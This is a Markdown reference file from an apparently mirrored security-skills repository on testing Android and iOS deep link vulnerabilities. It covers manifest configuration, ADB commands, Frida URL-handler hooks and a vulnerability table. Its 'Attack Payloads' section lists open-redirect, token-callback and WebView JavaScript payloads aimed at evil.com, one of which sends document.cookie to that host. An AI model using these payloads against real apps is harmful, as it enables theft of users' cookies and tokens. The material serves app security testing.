creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 21:54:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
1cffd664f555699d8e2b46f5ea94edaaa520f721
Anthropic-Cybersecurity-Skills/skills/exploiting-deeplink-vulnerabilities/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal 
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

107 lines
2.5 KiB
Markdown
Raw Blame History

# API Reference: Deep Link Vulnerability Testing
## Android Deep Links
### AndroidManifest.xml Configuration
```xml
<activity android:name=".DeepLinkActivity" android:exported="true">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="myapp" android:host="open"/>
</intent-filter>
</activity>
```
### ADB Testing
```bash
adb shell am start -W -a android.intent.action.VIEW \
-d "myapp://open/path?param=value" com.target.app
```
### Intent URI Scheme
```
intent://path#Intent;scheme=myapp;package=com.target.app;end
```
## iOS URL Schemes
### Info.plist Configuration
```xml
<key>CFBundleURLTypes</key>
<array>
<dict>
<key>CFBundleURLSchemes</key>
<array>
<string>myapp</string>
</array>
</dict>
</array>
```
### Universal Links (apple-app-site-association)
```json
{
"applinks": {
"apps": [],
"details": [{
"appID": "TEAM_ID.com.example.app",
"paths": ["/open/*", "/product/*"]
}]
}
}
```
## Vulnerability Types
| Type | Risk | Description |
|------|------|-------------|
| Open Redirect | HIGH | Deep link redirects to attacker URL |
| JavaScript Injection | CRITICAL | Code execution in WebView |
| Parameter Theft | HIGH | Token/credential exfiltration |
| Intent Redirect | HIGH | Android intent hijacking |
| Path Traversal | MEDIUM | Access unintended app sections |
## Attack Payloads
### Open Redirect
```
myapp://open?redirect=https://evil.com
myapp://open?url=javascript:alert(document.cookie)
```
### WebView JavaScript
```
myapp://webview?url=javascript:fetch('https://evil.com/'+document.cookie)
```
### Parameter Injection
```
myapp://auth?token=stolen&callback=https://evil.com
```
## Frida — Runtime Deep Link Testing
### Hook URL Handler (Android)
```javascript
Java.perform(function() {
var Activity = Java.use("android.app.Activity");
Activity.onNewIntent.implementation = function(intent) {
console.log("Deep link: " + intent.getData().toString());
this.onNewIntent(intent);
};
});
```
### Hook URL Handler (iOS)
```javascript
var handler = ObjC.classes.AppDelegate["- application:openURL:options:"];
Interceptor.attach(handler.implementation, {
onEnter: function(args) {
var url = ObjC.Object(args[3]);
console.log("URL scheme: " + url.toString());
}
});
```
Reference in New Issue View Git Blame Copy Permalink